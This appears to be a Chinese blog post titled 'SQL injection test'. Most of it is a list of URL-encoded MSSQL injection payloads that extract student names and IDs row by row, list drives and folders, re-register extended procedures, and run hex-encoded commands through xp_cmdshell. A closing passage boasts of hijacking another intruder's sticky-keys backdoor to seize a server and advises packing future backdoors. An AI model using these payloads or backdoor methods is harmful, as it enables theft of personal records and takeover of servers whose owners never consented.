   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20;create%20table%20foofoofoo%20(a%20image);--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;declare%20@s%20varchar(4000)%20set%20@s=cast(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554c4c204944454e544954592028312c31293b%20as%20varchar(4000));exec(@s)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1

%20;create%20table%20[foofoofoo]([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1
   %20;exec%20master.dbo.sp_addextendedproc%200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
   %20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%201=1

%20;drop%20table%20[foofoofoo];--%20and%201=1
   %20and%20substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00)%20as%20nvarchar(4000)),%201,%201)%3E8%20and%201=1

恩,就这些吧.以后有奇淫技巧也往上贴贴.

话说 shadow 太WS了,居然用OD 跟别人留的shift后门,然后顺利拿到通关密码.服务器被果断拿下.

搞得我激情的搞几台开了远程的服务器狂点shift ,结果没弹出期望的界面

看来以后写的shift后门都要加猛壳.不然战果就很容易被别人占领了.

想想一切是否又回到原点，不能被动的让自己虚拟化啊！

SQL注入测试

Comments on: "SQL注入测试" (1)

Leave a comment for: "SQL注入测试"

Categories

Recent Posts

Recent Comments

Hot Posts

Archives

Blogroll

想想一切是否又回到原点，不能被动的让自己虚拟化啊！

SQL注入测试

Comments on: "SQL注入测试" (1)

Leave a comment for: "SQL注入测试"

Search

Categories

Recent Posts

Recent Comments

Hot Posts

Archives

Blogroll

Tag Cloud